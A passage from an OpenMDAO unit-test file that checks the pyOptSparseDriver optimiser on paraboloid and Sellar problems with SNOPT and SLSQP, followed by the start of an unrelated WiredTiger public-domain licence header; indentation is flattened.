prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_array_comp2D(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('widths', np.zeros((2, 2))), promotes=['*'])
model.add_subsystem('comp', TestExplCompArrayDense(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = areas - 20.0', c=np.zeros((2, 2)), areas=np.zeros((2, 2))),
promotes=['*'])
model.add_subsystem('obj', ExecComp('o = areas[0, 0]', areas=np.zeros((2, 2))),
promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('widths', lower=-50.0, upper=50.0)
model.add_objective('o')
model.add_constraint('c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['o']
assert_rel_error(self, obj, 20.0, 1e-6)
def test_simple_array_comp2D_array_lo_hi(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('widths', np.zeros((2, 2))), promotes=['*'])
model.add_subsystem('comp', TestExplCompArrayDense(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = areas - 20.0', c=np.zeros((2, 2)), areas=np.zeros((2, 2))),
promotes=['*'])
model.add_subsystem('obj', ExecComp('o = areas[0, 0]', areas=np.zeros((2, 2))),
promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('widths', lower=-50.0*np.ones((2, 2)), upper=50.0*np.ones((2, 2)))
model.add_objective('o')
model.add_constraint('c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['o']
assert_rel_error(self, obj, 20.0, 1e-6)
def test_fan_out(self):
# This tests sparse-response specification.
# This is a slightly modified FanOut
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 1.0))
model.add_subsystem('p2', IndepVarComp('x', 1.0))
model.add_subsystem('comp1', ExecComp('y = 3.0*x'))
model.add_subsystem('comp2', ExecComp('y = 5.0*x'))
model.add_subsystem('obj', ExecComp('o = i1 + i2'))
model.add_subsystem('con1', ExecComp('c = 15.0 - x'))
model.add_subsystem('con2', ExecComp('c = 15.0 - x'))
# hook up explicitly
model.connect('p1.x', 'comp1.x')
model.connect('p2.x', 'comp2.x')
model.connect('comp1.y', 'obj.i1')
model.connect('comp2.y', 'obj.i2')
model.connect('comp1.y', 'con1.x')
model.connect('comp2.y', 'con2.x')
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['print_results'] = False
model.add_design_var('p1.x', lower=-50.0, upper=50.0)
model.add_design_var('p2.x', lower=-50.0, upper=50.0)
model.add_objective('obj.o')
model.add_constraint('con1.c', equals=0.0)
model.add_constraint('con2.c', equals=0.0)
prob.setup(check=False)
prob.run_driver()
obj = prob['obj.o']
assert_rel_error(self, obj, 30.0, 1e-6)
# Verify that pyOpt has the correct wrt names
con1 = prob.driver.pyopt_solution.constraints['con1.c']
self.assertEqual(con1.wrt, ['p1.x'])
con2 = prob.driver.pyopt_solution.constraints['con2.c']
self.assertEqual(con2.wrt, ['p2.x'])
def test_inf_as_desvar_bounds(self):
        # User may use np.inf as a bound. It is unnecessary, but the user
# may do it anyway, so make sure SLSQP doesn't blow up with it (bug
# reported by rfalck)
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-np.inf, upper=np.inf)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_pyopt_fd_solution(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'pyopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-4)
assert_rel_error(self, prob['y'], -7.833334, 1e-4)
def test_pyopt_fd_is_called(self):
class ParaboloidApplyLinear(Paraboloid):
def apply_linear(params, unknowns, resids):
raise Exception("OpenMDAO's finite difference has been called. pyopt_fd\
\ option has failed.")
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidApplyLinear(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'pyopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_constraint('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
def test_snopt_fd_solution(self):
        if OPTIMIZER != 'SNOPT':
raise unittest.SkipTest()
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
def test_snopt_fd_is_called(self):
        if OPTIMIZER != 'SNOPT':
raise unittest.SkipTest()
class ParaboloidApplyLinear(Paraboloid):
def apply_linear(params, unknowns, resids):
raise Exception("OpenMDAO's finite difference has been called. snopt_fd\
\ option has failed.")
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidApplyLinear(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
def test_snopt_fd_option_error(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
with self.assertRaises(Exception) as raises_cm:
prob.run_driver()
exception = raises_cm.exception
msg = "SNOPT's internal finite difference can only be used with SNOPT"
self.assertEqual(exception.args[0], msg)
def test_unsupported_multiple_obj(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('comp2', Paraboloid())
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['gradient method'] = 'snopt_fd'
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_objective('comp2.f_xy')
model.add_constraint('c', upper=-15.0)
expected = 'Multiple objectives have been added to pyOptSparseDriver' \
' but the selected optimizer (SLSQP) does not support' \
' multiple objectives.'
prob.setup(check=False)
with self.assertRaises(RuntimeError) as cm:
prob.final_setup()
self.assertEqual(str(cm.exception), expected)
def test_simple_paraboloid_scaled_desvars_fwd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_fd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
model.approx_totals(method='fd')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_cs(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
model.approx_totals(method='cs')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_desvars_rev(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0, ref=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0, ref=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_fwd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_fd(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
model.approx_totals(method='fd')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_cs(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
model.approx_totals(method='cs')
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_constraint_rev(self):
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.set_solver_print(level=0)
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', lower=10.0, upper=11.0, ref=10.)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_objective_fwd(self):
prob = Problem()
model = prob.model = Group()
prob.set_solver_print(level=0)
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy', ref=10.)
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='fwd')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_simple_paraboloid_scaled_objective_rev(self):
prob = Problem()
model = prob.model = Group()
prob.set_solver_print(level=0)
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', Paraboloid(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = x - y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy', ref=10.)
model.add_constraint('c', lower=10.0, upper=11.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'] - prob['y'], 11.0, 1e-6)
def test_sellar_mdf(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SNOPT':
prob.driver.opt_settings['Verify level'] = 3
prob.driver.options['print_results'] = False
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
assert_rel_error(self, prob['z'][1], 0.0, 1e-3)
assert_rel_error(self, prob['x'], 0.0, 1e-3)
def test_analysis_error_objfunc(self):
# Component raises an analysis error during some runs, and pyopt
# attempts to recover.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
prob.setup(check=False)
prob.run_driver()
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, 1e-6)
assert_rel_error(self, prob['y'], -7.833334, 1e-6)
# Normally it takes 9 iterations, but takes 13 here because of the
# analysis failures. (note SLSQP takes 5 instead of 4)
if OPTIMIZER == 'SLSQP':
self.assertEqual(prob.driver.iter_count, 7)
else:
self.assertEqual(prob.driver.iter_count, 15)
def test_raised_error_objfunc(self):
# Component fails hard this time during execution, so we expect
# pyoptsparse to raise.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
# SNOPT has a weird cleanup problem when this fails, so we use SLSQP. For the
# regular failure, it doesn't matter which opt we choose since they all fail through.
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.fail_hard = True
prob.setup(check=False)
with self.assertRaises(Exception) as err:
prob.run_driver()
# pyopt's failure message differs by platform and is not informative anyway
def test_analysis_error_sensfunc(self):
# Component raises an analysis error during some linearize calls, and
# pyopt attempts to recover.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = OPTIMIZER
if OPTIMIZER == 'SLSQP':
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.grad_fail_at = 2
comp.eval_fail_at = 100
prob.setup(check=False)
prob.run_driver()
# SLSQP does a bad job recovering from gradient failures
if OPTIMIZER == 'SLSQP':
tol = 1e-2
else:
tol = 1e-6
# Minimum should be at (7.166667, -7.833334)
assert_rel_error(self, prob['x'], 7.16667, tol)
assert_rel_error(self, prob['y'], -7.833334, tol)
# Normally it takes 9 iterations, but takes 13 here because of the
# gradfunc failures. (note SLSQP just doesn't do well)
if OPTIMIZER == 'SNOPT':
self.assertEqual(prob.driver.iter_count, 15)
def test_raised_error_sensfunc(self):
# Component fails hard this time during gradient eval, so we expect
# pyoptsparse to raise.
prob = Problem()
model = prob.model = Group()
model.add_subsystem('p1', IndepVarComp('x', 50.0), promotes=['*'])
model.add_subsystem('p2', IndepVarComp('y', 50.0), promotes=['*'])
comp = model.add_subsystem('comp', ParaboloidAE(), promotes=['*'])
model.add_subsystem('con', ExecComp('c = - x + y'), promotes=['*'])
prob.driver = pyOptSparseDriver()
# SNOPT has a weird cleanup problem when this fails, so we use SLSQP. For the
# regular failure, it doesn't matter which opt we choose since they all fail through.
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.opt_settings['ACC'] = 1e-9
prob.driver.options['print_results'] = False
model.add_design_var('x', lower=-50.0, upper=50.0)
model.add_design_var('y', lower=-50.0, upper=50.0)
model.add_objective('f_xy')
model.add_constraint('c', upper=-15.0)
comp.fail_hard = True
comp.grad_fail_at = 2
comp.eval_fail_at = 100
prob.setup(check=False)
with self.assertRaises(Exception) as err:
prob.run_driver()
# pyopt's failure message differs by platform and is not informative anyway
del prob
class TestPyoptSparseFeature(unittest.TestCase):
def setUp(self):
if OPT is None:
raise unittest.SkipTest("pyoptsparse is not installed")
if OPTIMIZER is None:
raise unittest.SkipTest("pyoptsparse is not providing SNOPT or SLSQP")
def test_basic(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_settings_print(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.options['print_results'] = False
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_slsqp_atol(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.opt_settings['ACC'] = 1e-9
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
def test_slsqp_maxit(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SLSQP"
prob.driver.opt_settings['MAXIT'] = 3
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.98337708, 1e-3)
@unittest.skipIf(OPTIMIZER in [None, "SLSQP"], "pyoptsparse is not providing SNOPT" )
def test_snopt_atol(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SNOPT"
prob.driver.opt_settings['Major feasibility tolerance'] = 1e-9
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9776, 1e-3)
@unittest.skipIf(OPTIMIZER in [None, "SLSQP"], "pyoptsparse is not providing SNOPT" )
def test_snopt_maxit(self):
prob = Problem()
model = prob.model = SellarDerivativesGrouped()
prob.driver = pyOptSparseDriver()
prob.driver.options['optimizer'] = "SNOPT"
prob.driver.opt_settings['Major iterations limit'] = 4
model.add_design_var('z', lower=np.array([-10.0, 0.0]), upper=np.array([10.0, 10.0]))
model.add_design_var('x', lower=0.0, upper=10.0)
model.add_objective('obj')
model.add_constraint('con1', upper=0.0)
model.add_constraint('con2', upper=0.0)
prob.set_solver_print(level=0)
prob.setup(check=False, mode='rev')
prob.run_driver()
assert_rel_error(self, prob['z'][0], 1.9780247, 1e-3)
if __name__ == "__main__":
unittest.main()
|
py | b404261c0660a7d91a3a76b45506283cf7c31dcb | #!/usr/bin/env python
#
# Public Domain 2014-2016 MongoDB, Inc.
# Public Domain 2008-2014 WiredTiger, Inc.
#
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
